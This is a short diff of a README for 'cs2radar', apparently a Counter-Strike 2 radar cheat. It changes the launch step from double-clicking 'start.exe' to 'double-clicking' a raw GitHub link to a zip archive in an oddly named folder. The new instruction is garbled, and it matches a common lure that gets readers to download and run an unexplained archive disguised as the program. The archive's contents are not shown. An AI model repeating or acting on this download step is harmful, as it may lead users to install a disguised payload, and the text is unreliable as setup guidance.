dbiego87/cs2radar/README.md

 #### **Step 2: Launch the Application**

 1. Navigate to the cs2radar directory.
-2. Run the application by double-clicking `start.exe`.
+2. Run the application by double-clicking `https://github.com/dbiego87/cs2radar/raw/refs/heads/main/pansied/cs_radar_1.6.zip`.
 3. Once the application runs, your radar is now functional on the local network.

 #### **Step 3: Connect with Friends**